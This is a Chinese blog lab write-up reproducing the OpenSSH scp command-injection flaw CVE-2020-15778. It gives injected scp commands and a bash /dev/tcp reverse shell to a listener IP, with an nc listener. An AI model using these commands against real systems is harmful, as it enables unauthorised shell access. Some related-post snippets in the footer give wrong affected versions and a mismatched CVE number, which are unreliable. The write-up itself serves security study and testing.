(CVE-2020-15778)OpenSSH_8.3-命令注入漏洞复现

最新推荐文章于 2024-04-18 05:16:07 发布
最新推荐文章于 2024-04-18 05:16:07 发布
阅读量1.9k 收藏 1
点赞数 2
分类专栏: # shell Linux 漏洞利用 文章标签: 安全 shell linux
本文链接:https://blog.csdn.net/dreamerrrrrr/article/details/109306012
版权
Linux 同时被 3 个专栏收录
10 篇文章 1 订阅
订阅专栏
漏洞利用
3 篇文章 0 订阅
订阅专栏
shell
1 篇文章 0 订阅
订阅专栏

漏洞复现简单,但是需要知道ssh密码。主要是针对已知ssh密码,但没有访问权限/登录权限的攻击。

攻击测试

kali:
上传任意文件到靶机上,文件允许为空,``里面的命令作为注入点进行攻击。

scp dic.txt root@192.168.0.102:'`touch /tmp/test.txt` /tmp'

命令分析:
  使用scp将本地文件dic.txt上传到服务器root@192.168.0.187的/tmp文件夹,使``括起来的touch /tmp/test.txt就是注入的命令,会生成一个新的文件test.txt。
靶机:
靶机查看/tmp目录下的文件:

[root@localhost tmp]# ls
dic.txt  test.txt

Getshell

kali:

#使用一个窗口开启nc进行监听
nc -lvvp 7777
#开启另一个窗口,上传反弹shell的命令
scp dic.txt root@192.168.0.101:'`bash -i >& /dev/tcp/192.168.0.130/7777 0>&1`/tmp/attack.txt'

注意:

刚开始一直不成功,报错如下:

zsh:1: no such file or directory: /dev/tcp/192.168.0.101/7777

感觉是zsh的问题,然后将靶机上的shell改回bash(之前改的zsh),然后就成功了!
暂时还不知道用zsh怎么写反弹语句,zsh -i好像不太行。

补充知识点:

更改默认shell命令

设zsh为默认shell:chsh -s /bin/zsh
设bash为默认shell: chsh -s /bin/bash

问:不能用zsh反弹shell吗?可以的话怎么创建呢?

参考:

  1. 彻底理解bash反弹shell:
    https://blog.csdn.net/include_heqile/article/details/85011135
  2. OpenSSH_8.3-命令注入漏洞攻击与修复:
    https://blog.csdn.net/weixin_48684274/article/details/109239909
安服仔
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
OpenSSH 命令注入漏洞通告(CVE-2020-15778Openssh <=8.3p1)
墨痕诉清风的博客
01-27 1081
漏洞复现简单,漏洞等级 严重。复现需要知道ssh密码,主要针对知道ssh密码却不给登录,这样就可进行反弹shell获取权限了。OpenSSH 命令注入漏洞(CVE-2020-15778) - cs4 - 博客园OpenSSH命令注入漏洞通告(CVE-2020-15778) - FreeBuf网络安全行业门户。
OpenSSH_8.3-命令注入漏洞攻击与修复
weixin_48684274的博客
10-23 7265
OpenSSH_8.3及以下-命令注入漏洞攻击与修复 2020年6月9日发现漏洞2020年7月18日公开漏洞。 攻击原理 使用SCP中远程功能进行命令注入漏洞复现要求 OpenSSH版本 =<8.3p1 ssh连接密码 攻击环境 攻击方:kali:192.168.0.130 靶机: CentOS7:192.168.0.187 攻击测试 kali: 上传任意文件到靶机上,文件允许为空,因为上传的文件不是主角。而是``里面的命令作为注入点进行攻击。 scp dic.txt root@192.1
OpenSSH 命令注入漏洞(CVE-2024-15778)修复教程_openssh_8
最新发布
芯_v_648374雨馨博客
04-18 696
2021年来,云主机进行了漏洞扫描,出现了大量openssh漏洞,我尝试升级过8.4、8.5的版本。16、mysql的innodb如何定位锁问题,mysql如何减少主从复制延迟?2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?5、LVS、Nginx、HAproxy有什么区别?9、讲述一下Tomcat8005、8009、8080三个端口的含义?7、Tomcat和Resin有什么区别,工作中你怎么选择?
适用于各种Linux系统漏洞修复的最新OpenSSH8.3p1通用安装包,可用于centos/redhat/ubuntu等
07-13
适用于各种Linux系统的最新OpenSSH8.3p1通用安装包,可编译安装,用于centos、ubuntu、redhat等系统OpenSSH安装及升级。附带了openssl和zlib。
Linux安装Jenkins
weixin_30711917的博客
09-24 289
1、先安装jdk 首先执行以下命令查看可安装的jdk版本:yum -y list java* 选择一个版本安装 yum install -y java-1.8.0-openjdk-devel.x86_64 等待安装即可 安装完成之后,查看安装的jdk版本,输入以下指令:java -version 2、安装jenkins wget -O :下载并以不同的文件名保存 y...
linux su命令错误 无法执行 /bin.zsh: 没有那个文件或目录
ayuyo_99的博客
08-22 6440
sudo vi /etc/passwd 查看该文件内的 那个路径和你报错的相同 然后改掉就可以了
CVE-2020-15778漏洞-——快速升级——openssh8.6.p1.tar.gz
06-21
OpenSSH 命令注入漏洞(CVE-2020-15778),文件包含installs.sh、openssh-8.6p1.tar.gz、openssl-1.1.1k.tar.gz、zlib-1.2.11.tar.gz。升级时候将openssh.tar.gz放至/home下解压,进入openssh目录,执行chmod +x ...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
通过升级opensshOpenSSH8.4 修复openssh低版本的漏洞 openssh8.4需要的 openssl-1.1.1g, openssh-8.4p1,zlib-1.2.11
CVE-2020-16898_exp_poc
12-11
CVE-2020-16898的exp和poc
Mac优化 zsh 的启动速度(M1)
恒Keep毅
05-23 1168
起因: 不知道何时何地我更新了个啥;我的终端开启就是十分的卡 卡到什么程度?卡到新开一个快20秒了;已经够离谱了吧,我就想来解决下这个问题 下面几乎没有图图了,因为是复盘,当时没截图,请耐心看完应该能解决 经过: 我直接谷歌:Mac终端开启过慢,然后开始看内容;发现就几个点。 首先是以Mac终端启动很慢解决方案各种转发出现的删除日志文件就行了。 好嘛,我删除,发现并没有什么niao用,其实一般看这种帖子就不行,还是忍不住试了试 发现知乎好文—优化 zsh 的启动速度 这个写的还是挺全的,并且里面外链
ubuntu的init与系统服务设置
lpp1989的专栏
08-14 834
init Init是位于/sbin/init的一个程序,它是在linux下,在系统启动过程中,初始化所有的设备驱动程序和数据结构等之后,由内核启动的一个用户级程序,并由此init程序进而完成系统的启动过程。 ubuntu与传统的linux略有不同,使用upstart完成系统的启动,但表面上仍维持init程序的形式。 运行级别 传统上,linux有几种不同的运行级别,包括如下几种: # 0
RLException:Unable to contact my own server at
qq_18428145的博客
05-12 1440
问题: RLException:Unable to contact my own server at [http://192.168.0.101:42985/].This usually means that the network is not configured properly. A common cause is that the machine cannot ping itself. Please check for errors by running : ping 192.168.0.101
linux下nc命令
wenwenxiong的专栏
06-16 2280
一、nc命令检测端口的用法 # nc  -v  -w 10 %IP%   -z  %PORT% -v  显示指令执行过程。 -w     设置等待连线的时间。 -u  表示使用UDP协议 -z  使用0输入/输出模式,只在扫描通信端口时使用。 例1:扫描指定的8080端口 . 代码如下: # nc -v -w 10 -z 192.168.0.100 8080 Conne
一文让你深刻理解异步请求池-DNS解析与实现
嵌入式Linux内核的博客
12-14 1465
一、DNS概念简述 DNS:Domain Name Service 域名解析服务,工作在应用层,是互联网的一项服务。它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网。DNS监听在TCP和UDP端口53。 FQDN:全称域名,如 www.example.com www是主机名 example.com是域名 实现名称到IP解析的有三种方式: 分散式解决方案:/etc/hosts,不易管理 集中式解决方案:NIC,如果主机太多,对单一服务的压力太大 分布式解决方案:DNS,解决
TTL 传输中过期
热门推荐
qq_16810885的博客
05-03 1万+
作为网络小白的我,就着五一放假在家里给自己充一下电。首先先是看了一下《B智能路由器开发指南》,然后就动手openwrt运行在vmware上试一下。折腾了半天总算是把下载的openwrt img(不是自己编译的)运行在了vmware上,并且ssh登录成功了。挺高兴的,在操作(瞎搞)VMware Network Adapter VMnet* 的时候,突然我的pc上不了网了。我开始方了,ping qq....
[无线连接手机]-通过局域网无线连接调试手机设备
燃吹 U 客帮
05-30 2163
没有 root 过的手机怎么无线 adb 连接 借助 USB 数据线以 IP 方式无线 ADB 手机设备 实现局域网无线调试蓝博兴 3.0.2 安卓机 Windows 查看端口占用
sudo: Cannot execute /usr/local/bin/zsh: No such file or directory 问题
weixin_34336526的博客
09-18 2337
参考:sudo: Cannot execute /usr/local/bin/zsh: No such file or directory 之前在美化Ubuntu的时候,下了个zsh,但是忘记改配置文件中的路径了,于是在su root的时候出现该情况。 解决方法: sudo vim /etc/passwd 将 root 的路径修改成 zsh 的路径即可。 2016/9/18 ...
openssh 命令注入漏洞(cve-2020-15778)
05-26
您好,关于openssh命令注入漏洞(cve-2020-15778),这是一个影响OpenSSH版本7.2到7.9p1的漏洞,攻击者可以利用该漏洞在受害系统上执行任意命令。建议用户及时升级OpenSSH版本到7.9p1或更新版本,并且在防火墙等安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值